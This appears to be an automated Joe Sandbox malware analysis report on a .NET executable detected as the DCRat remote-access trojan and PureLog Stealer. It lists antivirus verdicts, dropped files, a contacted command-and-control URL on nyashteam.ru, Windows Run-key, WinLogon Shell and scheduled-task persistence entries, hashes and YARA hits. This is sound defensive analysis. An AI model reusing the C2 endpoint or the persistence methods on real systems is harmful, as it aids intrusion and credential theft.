Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	271 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
0wdppTE7Op.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
0wdppTE7Op.exe	100%	Avira	HEUR/AGEN.1323342
0wdppTE7Op.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\JGwsqFZW.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\jlNXDlep.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\rYfvxS8JxL.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\lBrNuEzT.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\CDADXqpE.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\DealcvOk.log	100%	Joe Sandbox ML
C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\lBrNuEzT.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\CDADXqpE.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\oZfWghud.log	100%	Joe Sandbox ML
C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	100%	Joe Sandbox ML
C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\Microsoft OneDrive\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CDADXqpE.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DealcvOk.log	8%	ReversingLabs
C:\Users\user\Desktop\HqRBAmEs.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\JGwsqFZW.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ZoLhjnQK.log	25%	ReversingLabs
C:\Users\user\Desktop\eLngwYfk.log	25%	ReversingLabs
C:\Users\user\Desktop\jlNXDlep.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\lBrNuEzT.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oIpWQWtP.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\oZfWghud.log	8%	ReversingLabs
C:\Windows\RemotePackages\RemoteApps\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\twain_32\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label	Link
http://817087cm.nyashteam.ru/Jsmultiwp.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
817087cm.nyashteam.ru	104.21.2.8	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://817087cm.nyashteam.ru/Jsmultiwp.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000016.00000002.3017500323.000001E4201E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3018654855.00000185E36B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3100097229.00000163CADA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3014471608.000001DD23BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3108950490.000001CCD0488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3049525077.0000023D6BEC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001F.00000002.1865460317.0000023D5C078000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000016.00000002.1861626787.000001E410398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1865325429.00000185D3868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1885197736.00000163BAF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861937206.000001DD13D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1870602105.000001CCC0638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1865460317.0000023D5C078000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001F.00000002.1865460317.0000023D5C078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 0000001F.00000002.3049525077.0000023D6BEC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 0000001F.00000002.3049525077.0000023D6BEC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
https://g.live.com/odclientsettings/ProdV2.C:	qmgr.db.45.dr	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
https://www.ecosia.org/newtab/	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 0000001F.00000002.1865460317.0000023D5C078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 0000002D.00000003.1907086276.0000020E46656000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.45.dr	false	high
http://www.w3.	0wdppTE7Op.exe, 00000022.00000002.2571149857.000000000354F000.00000004.00000800.00020000.00000000.sdmp, 0wdppTE7Op.exe, 00000023.00000002.2576757074.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/ProdV2	qmgr.db.45.dr	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000016.00000002.1861626787.000001E410398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1865325429.00000185D3868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1885197736.00000163BAF58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861937206.000001DD13D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1870602105.000001CCC0638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1865460317.0000023D5C078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 0000001F.00000002.3049525077.0000023D6BEC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000016.00000002.3017500323.000001E4201E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3018654855.00000185E36B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3100097229.00000163CADA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3014471608.000001DD23BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3108950490.000001CCD0488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3049525077.0000023D6BEC8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000016.00000002.1861626787.000001E410171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1865325429.00000185D3641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1885197736.00000163BAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861937206.000001DD13B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1870602105.000001CCC0411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1865460317.0000023D5BE51000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0wdppTE7Op.exe, 00000000.00000002.1758169301.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1861626787.000001E410171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1865325429.00000185D3641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1885197736.00000163BAD31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1861937206.000001DD13B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1870602105.000001CCC0411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1865460317.0000023D5BE51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	YIGTMb23T1.42.dr, 4cXxUAGCIa.42.dr, u4VM7E9VOo.42.dr, Ij0f6V4N2F.42.dr, ANkK2bt0D4.42.dr, B3RMihQ38F.42.dr, zps7A8zytZ.42.dr, X1aZCfhDt5.42.dr, 9dgsanWhuo.42.dr, iONlmigzB2.42.dr, gvU5REE85c.42.dr, LONEx05eX1.42.dr, W6hqlOPTQf.42.dr, Z3mWAkJF9L.42.dr, nfm1cT8Ej5.42.dr, WHDyKUYIJq.42.dr, QyQeIe4bxu.42.dr, USXrSBTL3b.42.dr	false	high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	qmgr.db.45.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.186.200	unknown	United States		13335	CLOUDFLARENETUS	false
104.21.2.8	817087cm.nyashteam.ru	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572695
Start date and time:	2024-12-10 18:59:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0wdppTE7Op.exe renamed because original name is a hash value
Original Sample Name:	6706364c78566c589c6c45217e852b02.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@40/299@1/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 0wdppTE7Op.exe, PID 8008 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 0wdppTE7Op.exe

Simulations

Behavior and APIs

Time	Type	Description
13:00:20	API Interceptor	157x Sleep call for process: powershell.exe modified
13:00:32	API Interceptor	1810153x Sleep call for process: 0wdppTE7Op.exe modified
13:00:35	API Interceptor	2x Sleep call for process: svchost.exe modified
18:00:16	Task Scheduler	Run new task: 0wdppTE7Op path: "C:\Users\user\Desktop\0wdppTE7Op.exe"
18:00:17	Task Scheduler	Run new task: 0wdppTE7Op0 path: "C:\Users\user\Desktop\0wdppTE7Op.exe"
18:00:17	Task Scheduler	Run new task: SSnsduzASLgjHWjPpweraeKhUEuCEv path: "C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:00:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SSnsduzASLgjHWjPpweraeKhUEuCEv "C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:00:18	Task Scheduler	Run new task: SSnsduzASLgjHWjPpweraeKhUEuCEvS path: "C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:00:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0wdppTE7Op "C:\Users\user\Desktop\0wdppTE7Op.exe"
18:00:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SSnsduzASLgjHWjPpweraeKhUEuCEv "C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:00:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0wdppTE7Op "C:\Users\user\Desktop\0wdppTE7Op.exe"
18:01:01	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SSnsduzASLgjHWjPpweraeKhUEuCEv "C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:01:09	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 0wdppTE7Op "C:\Users\user\Desktop\0wdppTE7Op.exe"
18:01:26	Autostart	Run: WinLogon Shell "C:\Users\All Users\Microsoft OneDrive\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:01:34	Autostart	Run: WinLogon Shell "C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:01:43	Autostart	Run: WinLogon Shell "C:\Windows\RemotePackages\RemoteApps\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:01:51	Autostart	Run: WinLogon Shell "C:\Windows\twain_32\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:01:59	Autostart	Run: WinLogon Shell "C:\Windows\Temp\Crashpad\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe"
18:02:08	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\0wdppTE7Op.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.186.200	kqq1aAcVUQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php
104.21.2.8	kqq1aAcVUQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.16.1
	http://enteolcl.top/	Get hash	malicious	Unknown	Browse	104.21.112.1
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	104.21.64.208
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	CMK7DB5YtR.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
CLOUDFLARENETUS	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.16.1
	http://enteolcl.top/	Get hash	malicious	Unknown	Browse	104.21.112.1
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	104.21.64.208
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	CMK7DB5YtR.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\CDADXqpE.log	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	KyC6hVwU8Z.exe	Get hash	malicious	DCRat	Browse
	4si9noTBNw.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	fnNUIS1KeW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	kqq1aAcVUQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Qsi7IgkrWa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	A5EbyKyjhV.exe	Get hash	malicious	DCRat	Browse
	hjgesadfseawd.exe	Get hash	malicious	DCRat	Browse
	adjthjawdth.exe	Get hash	malicious	DCRat	Browse
	qNdO4D18CF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\Users\user\Desktop\0wdppTE7Op.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1960960
Entropy (8bit):	7.551693494526309
Encrypted:	false
SSDEEP:	49152:JV9LiEUzT6V+qiRGVcqb++v8PlPwvwOfPGZyM1b2DAWsM:JnezTGriRRq3vGNCJfPOy4b
MD5:	6706364C78566C589C6C45217E852B02
SHA1:	E0BC8A67A91D5EA42C072E63F36F4993D9620C2D
SHA-256:	87FA5D0D7912D7A1295E7D585F41797BC5C76A5EA7D9D7B362FCC20472715F9B
SHA-512:	3AED779886DCB08BAC7EDA66CF4B4ADBCF420AC0DFC702EF645F231CC40F0801CD16B35CAFB12DC5B7125C237DF65DF091366C884CE20158447752507E1023F7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\TableTextService\SSnsduzASLgjHWjPpweraeKhUEuCEv.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f@Gg................................. ... ....@.. .......................`............@.................................P...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H...........l............................................................0..........(.... ........8........E...............N...8....(.... ....~k...{....:....& ....8....(.... ....~k...{....:....& ....8....(.... ....~k...{....9....& ....8y......0..'....... ........8........E....]...........9...*...........8X......... ....~k...{....:....& ....8....8.... ....8....8.... ....~k...{....:....& ....8....~....(5... .... .... ....s....~....(9....... ....~k...{....:B...& ....87.......~

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x4887c3c6, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42211212029177386
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5:	56DF118FF9CB12D4D72E2D4EB4F923AF
SHA1:	4EBEBE2EED1C3D616A2276AD38A90FB7F415D6C3
SHA-256:	549DEF0C3C2121A685CA26F08E03BE19ED1A2C5D9F481EC426B05F52175B1F9B
